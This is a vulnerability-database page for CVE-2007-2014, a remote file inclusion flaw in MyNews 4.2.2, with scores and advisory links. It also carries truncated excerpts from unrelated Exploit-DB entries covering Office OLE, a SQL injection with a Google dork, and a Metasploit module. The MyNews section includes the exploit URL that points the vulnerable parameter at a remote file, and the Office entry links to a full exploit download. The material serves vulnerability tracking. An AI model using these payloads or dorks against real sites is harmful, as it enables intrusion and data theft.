CVE-2007-2014
published 2007-04-12CVE-2007-2014: PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.27%
80.9th percentile
PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the myNewsConf[path][sys][index] parameter, a different vector than CVE-2007-0633.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mynews | mynews | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-488g-2jcc-pf9r: PHP remote file inclusion vulnerability in include/blocks/week_events
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-2014 [HIGH] GHSA-488g-2jcc-pf9r: PHP remote file inclusion vulnerability in include/blocks/week_events
PHP remote file inclusion vulnerability in include/blocks/week_events.php in MyNews 4.2.2 allows remote attackers to execute arbitrary PHP code via a URL in the myNewsConf[path][sys][index] parameter, a different vector than CVE-2007-0633.
Red Hat
qemu: cirrus: insufficient blit region checks
vendor_redhat·2014-12-04·CVSS 7.2
CVE-2014-8106 [HIGH] CWE-20 qemu: cirrus: insufficient blit region checks
qemu: cirrus: insufficient blit region checks
Heap-based buffer overflow in the Cirrus VGA emulator (hw/display/cirrus_vga.c) in QEMU before 2.2.0 allows local guest users to execute arbitrary code via vectors related to blit regions. NOTE: this vulnerability exists because an incomplete fix for CVE-2007-1320.
It was found that the Cirrus blit region checks were insufficient. A privileged guest user could use this flaw to write outside of VRAM-allocated buffer boundaries in the host's QEMU process address space with attacker-provided data.
Statement: This issue affects the qemu-kvm packages as shipped with Red Hat Enterprise Linux 6, a future update may address this flaw.
This issue affects the kvm packages as shipped with Red Hat Enterprise Linux 5. Red Hat Enterprise Linux 5 is now in
No detection rules found.
Exploit-DB
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
exploitdb·2014-11-12·CVSS 7.8
CVE-2014-6352 [HIGH] Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
Microsoft Office 2007/2010 - OLE Arbitrary Command Execution
---
#
# Full exploit: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35216.rar
#
#CVE-2014-6352 OLE Remote Code Execution
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Advanced Hacking Trainings - http://training.aslitsecurity.com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Tested on win7 - office 2007 and 2010. The exploit will not give UAC warning the user account is administrator. Else there will be a UAC warning.
#No .inf file is required in this exploit
#The size of executable payload should be less than 400kb
#python 2.7 required
#The folder "temp" should be in same dir as this python file.
# usage - python.exe
Exploit-DB
YourMembers Plugin - Blind SQL Injection
exploitdb·2014-10-14
CVE-2014-100003 YourMembers Plugin - Blind SQL Injection
YourMembers Plugin - Blind SQL Injection
---
Vulnerability title: Blind SQL Injection Vulnerability in YourMembers plugin
CVE: N/A
Vendor: YourMembers plugin
Product: https://github.com/YourMembers/yourmembers/tree/master/ym_trunk
Affected version: Version 3, 29 June 2007 (https://github.com/YourMembers/yourmembers/blob/master/LICENSE)
Google dork: inurl:ym_download_id=
Fixed version: N/A
Reported by: Tien Tran Dinh - [email protected]
Details:
The Blind SQL injection vulnerability has been found and confirmed within the software as an anonymous user. A successful attack could allow an anonymous attacker to access information such as username and password hashes that are stored in the database. The following URL and parameter has been confirmed to suffer from blind SQL injection:
G
Exploit-DB
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
exploitdb·2014-09-29
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)
---
# Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability
# Google Dork: NA
# Date: 08/01/2014
# Exploit Author: Nate Power
# Vendor Homepage: microsoft.com
# Software Link: NA
# Version: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# Tested on: Exchange OWA 2003, Exchange CAS 2007/2010/2013
# CVE : NA
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'Outlook Web App (OWA) / Client Access Server (CAS) IIS HTTP Internal IP Disclosure',
'Description' => %q{
This module tests vulnerable IIS HTTP header file paths on Microsoft Exchange OWA 2003, CAS 2007, 2010, 201
Exploit-DB
Microsoft PowerPoint 2007 - Crash (PoC)
exploitdb·2013-07-01
CVE-2014-2671 Microsoft PowerPoint 2007 - Crash (PoC)
Microsoft PowerPoint 2007 - Crash (PoC)
---
# Title : Microsoft Office PowerPoint 2007 Crash PoC
# Date: 2013-01-12
# Software Link: http://office.microsoft.com/
# Author: Asesino04
# Tested on: Windows XP SP2
# Special Thanks To : Ness Oum El Bouaghi
# Bug Description:
when you insert a sound to Microsoft office powerpoint 2007 ;the software will get crashed
it tested on office 2007 ,all the versions may be affected too
# Credit: This Bug was founded by Asesino04 "The Black Devils"
# Proof Of Concept
https://fbcdn-sphotos-g-a.akamaihd.net/hphotos-ak-prn1/601368_541967942509686_881180451_n.jpg
/-->
EAX FFFFFFFF
ECX 00000000
EDX 00000000
EBX 0003DAD8
ESP 0013BC5C
EBP 0013BCF0
ESI FFFFFFFF
EDI 00199FF2
EIP 0460E650 quartz.0460E650
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(
Exploit-DB
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
exploitdb·2007-04-10
CVE-2007-2014 MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23398/info
MyNews is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
This issue affects MyNews 4.2.2 and prior versions.
http://www.example.com/include/blocks/week_events.php?myNewsConf[path][sys][index]=[REMOTEFILE]?
2007-04-12
Published